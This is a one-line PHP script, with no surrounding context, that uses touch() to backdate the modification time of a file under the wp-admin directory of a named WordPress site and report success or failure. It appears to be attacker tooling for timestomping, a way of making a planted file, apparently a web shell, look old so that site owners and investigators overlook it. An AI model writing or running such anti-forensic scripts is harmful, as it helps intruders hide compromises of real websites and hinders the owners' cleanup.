<?php $path = '/home/bajjoitalia.com/public_html/wp-admin/user/menu.php'; if (@touch($path, 1737554782)) { die('!success!'); } die('!failed!');